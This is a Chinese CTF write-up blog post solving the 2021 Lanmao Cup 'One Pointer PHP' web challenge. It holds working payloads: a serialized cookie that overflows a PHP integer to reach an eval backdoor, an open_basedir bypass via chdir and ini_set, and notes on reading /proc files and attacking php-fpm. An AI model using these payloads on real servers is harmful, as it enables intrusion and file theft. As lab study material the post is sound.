
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>蓝帽杯 2021 One Pointer PHP - y1zh3e7</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="y1zh3e7,"> 
    <meta name="description" content="打开题拿源码 
add_api.php
12345678910111213141516&amp;lt;?phpinclude &amp;quot;user.php&amp;quot;;if($user=unserializ,"> 
    <meta name="author" content="y1zh3e7"> 
    <link rel="alternative" href="atom.xml" title="y1zh3e7" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.ico"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content="蓝帽杯 2021 One Pointer PHP - y1zh3e7"/>
    <meta name="twitter:description" content="打开题拿源码 
add_api.php
12345678910111213141516&amp;lt;?phpinclude &amp;quot;user.php&amp;quot;;if($user=unserializ,"/>
    
    
    
    
    <meta property="og:site_name" content="y1zh3e7"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content="蓝帽杯 2021 One Pointer PHP - y1zh3e7"/>
    <meta property="og:description" content="打开题拿源码 
add_api.php
12345678910111213141516&amp;lt;?phpinclude &amp;quot;user.php&amp;quot;;if($user=unserializ,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">
<link rel="stylesheet" href="/css/site.css">

    
<!-- 代码块复制 -->
<script type="text/javascript" src="//cdn.jsdelivr.net/npm/clipboard@latest/dist/clipboard.js"></script>

<meta name="generator" content="Hexo 5.4.2"></head>

<body class="loading">
    <span id="config-title" style="display:none">y1zh3e7</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="https://y1zh3e7.github.io"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">蓝帽杯 2021 One Pointer PHP</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <!-- 帖子视图 -->

    <div class="post_cover">
        
            <img src="/img/cover.jpg" />
            
                    <div class="post_cover_mask"></div>
                    <div class="post_text">
                        <h1>
                            蓝帽杯 2021 One Pointer PHP
                        </h1>
                        <div>
                            <span>
                                四月 24, 2022
                            </span>

                            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/buu/" rel="tag">buu</a></li></ul>


                        </div>
                    </div>
    </div>
    

            <div class="article">
                <div class='main'>
                    <!-- 帖子视图 -->
                    
                            <h1 class="title">
                                蓝帽杯 2021 One Pointer PHP
                            </h1>
                            <div class="stuff">
                                <span>
                                    四月 24, 2022
                                </span>
                                
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/buu/" rel="tag">buu</a></li></ul>


                            </div>


                            <!-- 更新时间 -->
                            <div class="updated">
                                <div></div>
                                <span>该文章更新于 2022.04.24</span>
                            </div>

                            <div class="content markdown">
                                <p>打开题拿源码 </p>
<p>add_api.php</p>
<figure class="highlight php"><button class="btn-copy" data-clipboard-snippet="" title="复制"><img src="//cdn.jsdelivr.net/gh/5MayRain/ImageHosting/Blog/Website/icon/copy.svg" /></button><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;user.php&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>=<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">&quot;data&quot;</span>]))&#123;</span><br><span class="line">	<span class="variable">$count</span>[++<span class="variable">$user</span>-&gt;count]=<span class="number">1</span>;</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$count</span>[]=<span class="number">1</span>)&#123;</span><br><span class="line">		<span class="variable">$user</span>-&gt;count+=<span class="number">1</span>;</span><br><span class="line">		<span class="title function_ invoke__">setcookie</span>(<span class="string">&quot;data&quot;</span>,<span class="title function_ invoke__">serialize</span>(<span class="variable">$user</span>));</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&quot;backdoor&quot;</span>]);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	<span class="variable">$user</span>=<span class="keyword">new</span> <span class="title class_">User</span>;</span><br><span class="line">	<span class="variable">$user</span>-&gt;count=<span class="number">1</span>;</span><br><span class="line">	<span class="title function_ invoke__">setcookie</span>(<span class="string">&quot;data&quot;</span>,<span class="title function_ invoke__">serialize</span>(<span class="variable">$user</span>));</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>user.php</p>
<figure class="highlight php"><button class="btn-copy" data-clipboard-snippet="" title="复制"><img src="//cdn.jsdelivr.net/gh/5MayRain/ImageHosting/Blog/Website/icon/copy.svg" /></button><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span>&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$count</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="第一个点-php数组溢出"><a href="#第一个点-php数组溢出" class="headerlink" title="第一个点 php数组溢出"></a>第一个点 php数组溢出</h3><p>审计源码 想执行backdoor 第一个if可以不用管 这里注意是=赋值运算符 不是==比较运算符</p>
<p>第五行由于给$count[]赋值为1 永真 要让if条件为假才能进入eval</p>
<figure class="highlight php"><button class="btn-copy" data-clipboard-snippet="" title="复制"><img src="//cdn.jsdelivr.net/gh/5MayRain/ImageHosting/Blog/Website/icon/copy.svg" /></button><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;user.php&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>=<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">&quot;data&quot;</span>]))&#123;</span><br><span class="line">	<span class="variable">$count</span>[++<span class="variable">$user</span>-&gt;count]=<span class="number">1</span>;</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$count</span>[]=<span class="number">1</span>)&#123;</span><br><span class="line">		<span class="variable">$user</span>-&gt;count+=<span class="number">1</span>;</span><br><span class="line">		<span class="title function_ invoke__">setcookie</span>(<span class="string">&quot;data&quot;</span>,<span class="title function_ invoke__">serialize</span>(<span class="variable">$user</span>));</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&quot;backdoor&quot;</span>]);</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>PHP的int型数据取值范围，与操作系统相关，32位系统上为2的31次方，即-2147483648到2147483647，64位系统上为2的63次方，即-9223372036854775808到9223372036854775807。当key等于PHP int类型数据的最大值时，想要再插入一个更大的值便会造成溢出导致出现Warning</p>
<p>并且php数组还有一个特性 如果数组键名为空 那么就在已有键名自增一次作为键名 如果自增结果大于int上限值 赋值就会失败</p>
<p><img src="C:/Users/86132/AppData/Roaming/Typora/typora-user-images/image-20220424214731896.png" alt="image-20220424214731896"></p>
<p><img src="https://s2.loli.net/2022/04/24/5jOXeQmIwdDh1Up.png" alt="image-20220424215012644"></p>
<p>所以这里的键名要为9223372036854775807 也就是说$user-&gt;count要为9223372036854775806</p>
<figure class="highlight php"><button class="btn-copy" data-clipboard-snippet="" title="复制"><img src="//cdn.jsdelivr.net/gh/5MayRain/ImageHosting/Blog/Website/icon/copy.svg" /></button><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$count</span>[++<span class="variable">$user</span>-&gt;count]=<span class="number">1</span>;</span><br></pre></td></tr></table></figure>

<p>这里可以通过修改$_COOKIE[data]的值来修改$user 的类变量</p>
<figure class="highlight php"><button class="btn-copy" data-clipboard-snippet="" title="复制"><img src="//cdn.jsdelivr.net/gh/5MayRain/ImageHosting/Blog/Website/icon/copy.svg" /></button><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>=<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">&quot;data&quot;</span>]))</span><br></pre></td></tr></table></figure>

<p>构造payload</p>
<figure class="highlight php"><button class="btn-copy" data-clipboard-snippet="" title="复制"><img src="//cdn.jsdelivr.net/gh/5MayRain/ImageHosting/Blog/Website/icon/copy.svg" /></button><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span>&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$count</span>=<span class="number">9223372036854775806</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title class_">User</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>));</span><br><span class="line"><span class="comment">//O%3A4%3A%22User%22%3A1%3A%7Bs%3A5%3A%22count%22%3Bi%3A9223372036854775806%3B%7D</span></span><br></pre></td></tr></table></figure>

<p>修改Cookie为  </p>
<figure class="highlight php"><button class="btn-copy" data-clipboard-snippet="" title="复制"><img src="//cdn.jsdelivr.net/gh/5MayRain/ImageHosting/Blog/Website/icon/copy.svg" /></button><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data = O%<span class="number">3</span>A4%<span class="number">3</span>A%<span class="number">22</span>User%<span class="number">22</span>%<span class="number">3</span>A1%<span class="number">3</span>A%<span class="number">7</span>Bs%<span class="number">3</span>A5%<span class="number">3</span>A%<span class="number">22</span>count%<span class="number">22</span>%<span class="number">3</span>Bi%<span class="number">3</span>A9223372036854775806%<span class="number">3</span>B%<span class="number">7</span>D</span><br></pre></td></tr></table></figure>

<p>在源码页面构造个phpinfo()看一下 成功绕过</p>
<p><img src="https://s2.loli.net/2022/04/24/kge6nv1tZl3FOAN.png" alt="image-20220424215950164"></p>
<h3 id="第二个点-绕过open-basedir"><a href="#第二个点-绕过open-basedir" class="headerlink" title="第二个点 绕过open basedir"></a>第二个点 绕过open basedir</h3><p>在php.ini中可以通过设置open basedir来限制访问权限 放个学习连接</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/LLeaves/p/13210005.html">Open_basedir绕过 - LLeaves - 博客园 (cnblogs.com)</a></p>
<p>绕过的方法很多 这里用glob伪协议绕一下 </p>
<p>再放个过程中可能会看到的东西</p>
<p><a target="_blank" rel="noopener" href="https://shipengliang.com/program-code/php-directoryiterator%E9%81%8D%E5%8E%86%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6%E5%A4%B9%E4%B8%8B%E5%85%A8%E9%83%A8%E6%96%87%E4%BB%B6.html">PHP-DirectoryIterator遍历目录文件夹下全部文件 | 时鹏亮的Blog (shipengliang.com)</a></p>
<p>[浅析PHP原生类 - 知乎 (zhihu.com)](<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/458866772#:~:text=%E5%8F%AF%E4%BB%A5%E7%9B%B4%E6%8E%A5%E9%85%8D%E5%90%88glob%E4%BC%AA%E5%8D%8F%E8%AE%AE%E6%9D%A5%E8%AF%BB%E5%8F%96%E7%9B%AE%E5%BD%95">https://zhuanlan.zhihu.com/p/458866772#:~:text=可以直接配合glob伪协议来读取目录</a> 下面看一下效果图,这种姿势也可以无视open_basedir的限制 并且从图中就可以看出这两个原生类的些许区别了，Filesystemlterator会以绝路路径的形式展现，而DirectoryIterator仅显示出当前目录下的文件信息)</p>
<p>已经可以eval了 直接连一下蚁剑 这里可能会有问题 为什么hackbar发送的是assert 而蚁剑还能用eval连接 assert我们知道就是执行php代码 eval也是  核心部分是可控的post参数 所以只要可以执行这个参数就可以</p>
<p><img src="C:/Users/86132/AppData/Roaming/Typora/typora-user-images/image-20220425161106882.png" alt="image-20220425161106882"></p>
<p>蚁剑连接的时候别忘了设置一下cookie</p>
<p><img src="C:/Users/86132/AppData/Roaming/Typora/typora-user-images/image-20220425161133422.png" alt="image-20220425161133422"></p>
<p>在根目录下找到flag 但是发现是空的 原因是php ini中设置了open basedir 限制了我们的访问 可以在phpinfo中看到</p>
<p>也就是说我们可访问的范围只有/var/www/html 但如果在www下有一个叫html1的也是可以访问的 因为openbasedir筛选的是路径的前缀 具体的移步上面的学习链接</p>
<p><img src="C:/Users/86132/AppData/Roaming/Typora/typora-user-images/image-20220425162432733.png" alt="image-20220425162432733"></p>
<p><img src="C:/Users/86132/AppData/Roaming/Typora/typora-user-images/image-20220425162515210.png" alt="image-20220425162515210"></p>
<p>使用glob伪协议绕过 写一段脚本上传</p>
<p>w3这里有opendir的例子 正好可以拿来用 在路径前面加个伪协议就行了</p>
<p><img src="C:/Users/86132/AppData/Roaming/Typora/typora-user-images/image-20220425164747436.png" alt="image-20220425164747436"></p>
<p>上传并访问 修改路径后还是读取不了flag 换一种方式绕过</p>
<p><img src="C:/Users/86132/AppData/Roaming/Typora/typora-user-images/image-20220425164816700.png" alt="image-20220425164816700"></p>
<p>用set_ini和chdir()进行绕过    payload是这样的</p>
<figure class="highlight php"><button class="btn-copy" data-clipboard-snippet="" title="复制"><img src="//cdn.jsdelivr.net/gh/5MayRain/ImageHosting/Blog/Website/icon/copy.svg" /></button><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/add_api.php?backdoor=<span class="title function_ invoke__">mkdir</span>(<span class="string">&#x27;y1zh3e7&#x27;</span>);<span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;y1zh3e7&#x27;</span>);<span class="title function_ invoke__">ini_set</span>(<span class="string">&#x27;open_basedir&#x27;</span>,<span class="string">&#x27;..&#x27;</span>);<span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;..&#x27;</span>);<span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;..&#x27;</span>);<span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;..&#x27;</span>);<span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;..&#x27;</span>);<span class="title function_ invoke__">ini_set</span>(<span class="string">&#x27;open_basedir&#x27;</span>,<span class="string">&#x27;/&#x27;</span>);<span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">scandir</span>(<span class="string">&#x27;/&#x27;</span>));</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>我看了很多大佬的解释都有点迷 自己总结了一下</p>
<p>**set_ini 和chdir() 绕过open_basedir: **</p>
<p>先举个例子 比如我现在在 /var/www/html下</p>
<p>1.如果openbasedir限制的目录是我们现在所在目录 就要在该目录下新建一个子目录 </p>
<p>所以有了mkdir(‘y1zh3e7’) 并切换到这个子目录   </p>
<p>当前目录：/var/www/html/y1zh3e7       open_basedir限制目录：/var/www/html</p>
<p>2.通过ini_set修改open_basedir的参数 可以看到上面将限制目录修改成了相对上一级目录 </p>
<p>当前目录：/var/www/html/y1zh3e7       open_basedir限制目录：/var/www/html</p>
<p>3.通过chdir返回上一级目录 </p>
<p>当前目录：/var/www/html       open_basedir限制目录：/var/www</p>
<p>4.再返回一级</p>
<p>当前目录：/var/www       open_basedir限制目录：/var</p>
<p>5.再返回一级目录</p>
<p>当前目录：/var      open_basedir限制目录：/</p>
<p>成功拿到查看根目录的权限 其实再返回几次也是可以的  因为根目录再往上一级还是根目录</p>
<p><img src="https://s2.loli.net/2022/04/27/cY843SLql2wUOVG.png" alt="image-20220427095928253"></p>
<h3 id="第三个点-linux系统下的信息泄露-proc"><a href="#第三个点-linux系统下的信息泄露-proc" class="headerlink" title="第三个点 linux系统下的信息泄露 proc"></a>第三个点 linux系统下的信息泄露 proc</h3><p>这里更换路径为flag 还是不能读取  这里涉及到了关于proc的知识 放个连接 再补充一下</p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/241148">Proc 目录在 CTF 中的利用 - 安全客，安全资讯平台 (anquanke.com)</a></p>
<figure class="highlight shell"><button class="btn-copy" data-clipboard-snippet="" title="复制"><img src="//cdn.jsdelivr.net/gh/5MayRain/ImageHosting/Blog/Website/icon/copy.svg" /></button><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1.cmdline(文件)</span><br><span class="line">	cmdline 文件存储着启动当前进程的完整命令，但僵尸进程目录中的此文件不包含任何信息。可以通过查看cmdline目录获取启动指定进程的完整命令</span><br><span class="line">我们可以使用爆破file_get_contents(&#x27;/proc/§§/cmdline&#x27;);的方法得到全部当前执行的程序</span><br><span class="line">2.cwd(目录软链接)</span><br><span class="line">	cwd 文件是一个指向当前进程运行目录的符号链接。可以通过查看cwd文件获取目标指定进程环境的运行目录(就是一个目录的软链接)</span><br><span class="line">3.exe(当前进程的可执行文件)</span><br><span class="line">	exe 是一个指向启动当前进程的可执行文件（完整路径）的符号链接。通过exe文件我们可以获得指定进程的可执行文件的完整路径</span><br><span class="line">4.environ(文件)</span><br><span class="line">	environ文件存储着当前进程的环境变量列表，彼此间用空字符（NULL）隔开，变量用大写字母表示，其值用小写字母表示。可以通过查看environ目录来获取指定进程的环境变量信息：</span><br><span class="line">5.fd</span><br><span class="line">	fd是一个目录，里面包含着当前进程打开的每一个文件的描述符（file descriptor）差不多就是路径啦，这些文件描述符是指向实际文件的一个符号连接，即每个通过这个进程打开的文件都会显示在这里。所以我们可以通过fd目录的文件获取进程，从而打开每个文件的路径以及文件内容</span><br><span class="line">6.maps(文件)</span><br><span class="line">	/proc/meminfo可以看到整个系统内存消耗情况,基于里面信息能大概判断泄露的内存的属性，是哪个区域在泄漏、对应哪个文件。辅助工具procmem输出更可读的maps信息</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>利用self 和 proc拿到提示 在题目环境开启时启动了fpm 回到phpinfo也有相关信息 关于php-fpm 以及 fast-cgi移步我的另一篇博客</p>
<p><a href="https://y1zh3e7.github.io/2022/04/26/%E5%8A%A8%E6%80%81%E7%BD%91%E9%A1%B5%E5%9F%BA%E7%A1%80%E5%8E%9F%E7%90%86-CGI/">动态网页基础原理-CGI - y1zh3e7</a></p>
<p><img src="https://s2.loli.net/2022/04/27/RJSPjwWomAr1lXd.png" alt="image-20220427102838855"></p>
<p><img src="https://s2.loli.net/2022/04/27/V9quFbCNocWZw4n.png" alt="image-20220427102512492">、</p>
<p>接下来就有两个办法了 通过访问/proc/self/maps 可以发现一个bypass的so文件 会pwn的师傅可以下载下来pwn一下 </p>
<p><img src="https://s2.loli.net/2022/04/27/gjoc4dmuQUYnNyS.png" alt="image-20220427103252380"></p>
<p>不会pwn的话就用FTP协议打fpm的方式进行绕过</p>
<h3 id="第四个点-FTP协议打php-fpm"><a href="#第四个点-FTP协议打php-fpm" class="headerlink" title="第四个点 FTP协议打php-fpm"></a>第四个点 FTP协议打php-fpm</h3><p>放个P牛链接 </p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html">Fastcgi协议分析 &amp;&amp; PHP-FPM未授权访问漏洞 &amp;&amp; Exp编写 | 离别歌 (leavesongs.com)</a></p>

                                    <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
                                    <audio id="audio" loop="1" preload="auto" controls="controls"
                                        data-autoplay=" false">
                                        <source type="audio/mpeg" src="">
                                    </audio>
                                    
                                        <ul id="audio-list" style="display:none">
                                            
                                                
                                                    <li title="0" data-url="https://link.hhtjim.com/163/526101268.mp3"></li>
                                                    
                                                            
                                                
                                                    <li title="1" data-url="https://link.hhtjim.com/163/526101451.mp3"></li>
                                                    
                                                            
                                                
                                                    <li title="2" data-url="https://link.hhtjim.com/163/526098988.mp3"></li>
                                                    
                                                            
                                                
                                                    <li title="3" data-url="https://link.hhtjim.com/163/526105244.mp3"></li>
                                                    
                                                            
                                                
                                                    <li title="4" data-url="https://link.hhtjim.com/163/543772350.mp3"></li>
                                                    
                                                            
                                                
                                                    <li title="5" data-url="https://link.hhtjim.com/163/1454025662.mp3"></li>
                                                    
                                                            
                                                
                                                    <li title="6" data-url="https://link.hhtjim.com/qq/004cNNNW0QG6RR.mp3"></li>
                                                    
                                                            
                                        </ul>
                                        
                            </div>
                            
    <div id="gitalk-container" class="comment link"
		data-enable="true"
        data-ae="false"
        data-ci=""
        data-cs=""
        data-r=""
        data-o=""
        data-a=""
        data-d="false"
    >查看评论</div>


                </div>
                
            </div>
    </div>
</div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>
<script src="/js/codeCopy.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
